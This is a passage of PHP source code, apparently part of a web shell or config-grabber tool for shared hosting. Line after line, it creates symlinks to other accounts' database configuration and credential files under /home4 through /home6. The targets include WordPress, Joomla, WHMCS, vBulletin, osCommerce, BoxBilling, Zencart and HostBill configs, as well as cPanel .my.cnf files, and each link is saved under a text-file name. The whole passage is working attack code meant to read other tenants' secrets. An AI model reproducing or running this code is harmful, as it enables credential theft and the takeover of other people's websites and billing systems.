  1672. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1673. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1674. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1675. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1676. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1677. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1678. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1679. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1680. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1681. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1682. @symlink('/home4/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1683. @symlink('/home4/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1684.  
  1685. //home5
  1686.  
  1687. @symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1688. @symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1689. @symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1690. @symlink('/home5/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1691. @symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1692. @symlink('/home5/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1693. @symlink('/home5/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1694. @symlink('/home5/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1695. @symlink('/home5/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1696. @symlink('/home5/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1697. @symlink('/home5/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1698. @symlink('/home5/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1699. @symlink('/home5/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1700. @symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1701. @symlink('/home5/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1702. @symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1703. @symlink('/home5/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1704. @symlink('/home5/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1705. @symlink('/home5/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1706. @symlink('/home5/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1707. @symlink('/home5/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1708. @symlink('/home5/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1709. @symlink('/home5/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1710. @symlink('/home5/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1711. @symlink('/home5/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1712. @symlink('/home5/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1713. @symlink('/home5/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1714. @symlink('/home5/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1715. @symlink('/home5/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1716. @symlink('/home5/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1717. @symlink('/home5/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1718. @symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1719. @symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1720. @symlink('/home5/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1721. @symlink('/home5/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1722. @symlink('/home5/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1723. @symlink('/home5/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1724. @symlink('/home5/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1725. @symlink('/home5/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1726. @symlink('/home5/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1727. @symlink('/home5/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1728. @symlink('/home5/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1729. @symlink('/home5/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1730. @symlink('/home5/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1731. @symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1732. @symlink('/home5/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1733. @symlink('/home5/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home5/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home5/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home5/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home5/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home5/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home5/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home5/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home5/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home5/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home5/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home5/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home5/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home5/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home5/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home5/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home5/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home5/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home5/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home5/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home5/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home5/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home5/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home5/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1762. @symlink('/home5/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1763. @symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1764. @symlink('/home5/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1765. @symlink('/home5/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1766. @symlink('/home5/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1767. @symlink('/home5/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1768. @symlink('/home5/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1769. @symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home5/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home5/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home5/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home5/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home5/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home5/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home5/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home5/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home5/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home5/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home5/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home5/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home5/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home5/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home5/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home5/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home5/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home5/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home5/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home5/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home5/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home5/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home5/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home5/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home5/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home5/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home5/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home5/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home5/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home5/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home5/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home5/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home5/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home5/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home5/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home5/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home5/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home5/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home5/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home5/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home5/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home5/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1820. @symlink('/home5/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1821. @symlink('/home5/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1822. @symlink('/home5/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1823. @symlink('/home5/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1824. @symlink('/home5/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1825. @symlink('/home5/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1826. @symlink('/home5/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1827. @symlink('/home5/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1828. @symlink('/home5/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1829. @symlink('/home5/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1830. @symlink('/home5/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1831. @symlink('/home5/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1832. @symlink('/home5/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1833. @symlink('/home5/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1834. @symlink('/home5/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1835. @symlink('/home5/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1836. @symlink('/home5/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1837. @symlink('/home5/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1838. @symlink('/home5/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1839. @symlink('/home5/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1840. @symlink('/home5/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1841. @symlink('/home5/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1842. @symlink('/home5/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1843. @symlink('/home5/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1844. @symlink('/home5/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1845. @symlink('/home5/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1846. @symlink('/home5/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1847. @symlink('/home5/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1848. @symlink('/home5/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1849. @symlink('/home5/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1850. @symlink('/home5/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1851. @symlink('/home5/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1852. @symlink('/home5/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1853. @symlink('/home5/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1854. @symlink('/home5/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1855. @symlink('/home5/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1856. @symlink('/home5/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1857. @symlink('/home5/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1858. @symlink('/home5/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1859. @symlink('/home5/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1860. @symlink('/home5/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1861. @symlink('/home5/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1862. @symlink('/home5/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1863. @symlink('/home5/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1864. @symlink('/home5/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1865. @symlink('/home5/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1866. @symlink('/home5/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1867. @symlink('/home5/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1868. @symlink('/home5/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1869.  
  1870. //home6
  1871.  
  1872. @symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1873. @symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1874. @symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1875. @symlink('/home6/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1876. @symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1877. @symlink('/home6/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1878. @symlink('/home6/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1879. @symlink('/home6/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1880. @symlink('/home6/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1881. @symlink('/home6/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1882. @symlink('/home6/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1883. @symlink('/home6/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1884. @symlink('/home6/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1885. @symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1886. @symlink('/home6/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1887. @symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1888. @symlink('/home6/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1889. @symlink('/home6/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1890. @symlink('/home6/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1891. @symlink('/home6/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1892. @symlink('/home6/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1893. @symlink('/home6/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1894. @symlink('/home6/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1895. @symlink('/home6/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1896. @symlink('/home6/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1897. @symlink('/home6/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1898. @symlink('/home6/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1899. @symlink('/home6/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1900. @symlink('/home6/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1901. @symlink('/home6/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1902. @symlink('/home6/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1903. @symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1904. @symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1905. @symlink('/home6/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1906. @symlink('/home6/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1907. @symlink('/home6/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1908. @symlink('/home6/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1909. @symlink('/home6/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1910. @symlink('/home6/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1911. @symlink('/home6/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1912. @symlink('/home6/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1913. @symlink('/home6/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1914. @symlink('/home6/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1915. @symlink('/home6/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1916. @symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1917. @symlink('/home6/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1918. @symlink('/home6/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home6/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home6/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home6/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home6/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home6/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home6/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home6/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home6/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home6/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home6/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home6/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home6/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home6/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home6/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home6/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home6/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home6/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home6/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home6/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home6/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1943. @symlink('/home6/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1944. @symlink('/home6/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1945. @symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1946. @symlink('/home6/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1947. @symlink('/home6/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1948. @symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1949. @symlink('/home6/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1950. @symlink('/home6/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1951. @symlink('/home6/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1952. @symlink('/home6/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1953. @symlink('/home6/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1954. @symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1955. @symlink('/home6/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1956. @symlink('/home6/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1957. @symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1958. @symlink('/home6/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1959. @symlink('/home6/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1960. @symlink('/home6/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1961. @symlink('/home6/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1962. @symlink('/home6/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1963. @symlink('/home6/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1964. @symlink('/home6/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1965. @symlink('/home6/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1966. @symlink('/home6/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1967. @symlink('/home6/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1968. @symlink('/home6/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1969. @symlink('/home6/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1970. @symlink('/home6/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1971. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1972. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1973. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1974. @symlink('/home6/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1975. @symlink('/home6/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1976. @symlink('/home6/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1977. @symlink('/home6/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1978. @symlink('/home6/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1979. @symlink('/home6/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1980. @symlink('/home6/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
